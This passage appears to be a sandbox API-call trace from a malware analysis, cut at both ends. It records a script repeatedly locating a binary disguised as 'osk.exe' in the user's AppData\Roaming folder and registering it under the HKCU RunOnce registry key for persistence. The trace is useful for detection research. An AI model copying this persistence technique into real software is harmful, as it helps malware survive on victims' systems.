varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.938] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.938] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.938] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0091.939] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.939] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x63 [0091.939] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.940] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0091.940] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.940] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.940] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.940] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.940] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.940] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.941] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.941] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.941] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.941] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.941] RegCloseKey (hKey=0x280) returned 0x0 [0091.941] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.941] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.942] SetTimer (hWnd=0x20280, nIDEvent=0x21de, uElapse=0xa, lpTimerFunc=0x0) returned 0x21de [0091.942] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.952] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.952] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.952] KillTimer (hWnd=0x20280, uIDEvent=0x21de) returned 1 [0091.952] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.952] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.953] IUnknown:Release (This=0x787518) returned 0x1 [0091.953] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.953] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.953] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.953] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.953] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.953] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.953] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.953] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.953] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.954] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0091.954] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.954] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x64 [0091.954] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.955] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0091.955] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.955] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.955] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.955] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.955] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.955] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.955] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.955] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.956] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.956] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.956] RegCloseKey (hKey=0x280) returned 0x0 [0091.956] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.956] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.956] SetTimer (hWnd=0x20280, nIDEvent=0x21df, uElapse=0xa, lpTimerFunc=0x0) returned 0x21df [0091.956] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.967] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.967] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.968] KillTimer (hWnd=0x20280, uIDEvent=0x21df) returned 1 [0091.968] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.968] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.968] IUnknown:Release (This=0x787518) returned 0x1 [0091.968] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.968] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.968] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.969] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0091.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0091.969] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0091.969] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0091.969] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0091.969] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x65 [0091.969] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0091.970] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0091.970] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.970] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0091.970] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.970] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0091.970] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0091.970] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0091.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0091.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0091.970] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0091.970] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0091.971] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0091.971] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0091.971] RegCloseKey (hKey=0x280) returned 0x0 [0091.971] IUnknown:Release (This=0x7a9740) returned 0x1 [0091.971] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.971] SetTimer (hWnd=0x20280, nIDEvent=0x21e0, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e0 [0091.971] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0091.983] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0091.983] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0091.983] KillTimer (hWnd=0x20280, uIDEvent=0x21e0) returned 1 [0091.984] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0091.984] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0091.984] IUnknown:Release (This=0x787518) returned 0x1 [0091.984] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0091.984] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0091.984] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0091.984] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0091.984] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0091.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0091.985] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 